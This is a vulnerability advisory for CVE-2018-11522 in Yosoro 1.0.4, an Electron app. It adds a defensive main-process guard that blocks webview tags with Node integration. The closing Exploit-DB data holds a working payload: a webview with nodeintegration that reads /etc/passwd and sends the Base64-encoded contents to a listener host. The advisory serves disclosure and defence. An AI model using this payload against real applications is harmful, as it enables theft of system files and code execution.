Vendor: Yosoro
By: Carlo Pelliccioni
CVSS: 6.1 (MEDIUM)
Remote Code Execution
CWE: 20
Product Name: Yosoro
Affected Version From: 1.0.4
Affected Version To: 1.0.4
Patch Exists: YES
Related CVE: CVE-2018-11522
CPE: a:yosoro:yosoro:1.0.4
Metasploit: N/A
Platforms Tested: MacOS 10.13.4
2018

Yosoro 1.0.4 – Remote Code Execution

A vulnerability in Yosoro 1.0.4 allows an attacker to execute arbitrary code on the target system. It is caused by insufficient input validation in the webview component. An attacker can exploit it by sending a specially crafted payload to the webview component. The payload is a <webview> tag carrying the nodeintegration attribute; its data: URL contains malicious JavaScript that reads the /etc/passwd file and sends the Base64-encoded contents to a remote server. The attacker can then use the information to gain access to the target system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Yosoro.
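
For developers of Electron applications that render untrusted content, one main-process guard against the <webview ... nodeintegration> pattern described in this advisory. This is an added example, not Yosoro's code or the vendor's patch; the names vetWebview and installWebviewGuard and the HTTPS-only allow-list are assumptions.

```javascript
// Added hardening example; not code from Yosoro or its patch.
// Assumption: guest pages only ever need to be loaded over HTTPS.
const ALLOWED_PROTOCOLS = new Set(['https:']);

// Decide what to do with a <webview> that rendered content tries to attach.
// Mutates webPreferences so the guest never receives Node.js access and
// returns false when the attach should be vetoed.
function vetWebview(webPreferences, params) {
  // Remove anything that would hand the guest page Node.js or a preload script.
  delete webPreferences.preload;
  delete webPreferences.preloadURL;
  webPreferences.nodeIntegration = false;
  webPreferences.contextIsolation = true;

  let protocol;
  try {
    protocol = new URL(String(params.src)).protocol;
  } catch {
    return false; // missing or unparsable src
  }
  // data:, file: and javascript: sources are refused.
  return ALLOWED_PROTOCOLS.has(protocol);
}

// Wire the check into every WebContents the application creates.
// `app` is assumed to be Electron's app object in the main process.
function installWebviewGuard(app) {
  app.on('web-contents-created', (_event, contents) => {
    contents.on('will-attach-webview', (event, webPreferences, params) => {
      if (!vetWebview(webPreferences, params)) event.preventDefault();
    });
  });
}

// Main-process usage (needs Electron, so shown as a comment):
//   const { app } = require('electron');
//   installWebviewGuard(app);
```

If the application has no need for guest pages at all, setting webviewTag: false in the BrowserWindow webPreferences removes the tag entirely.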

Exploit-DB raw data:

# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
# Hacktive Security

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>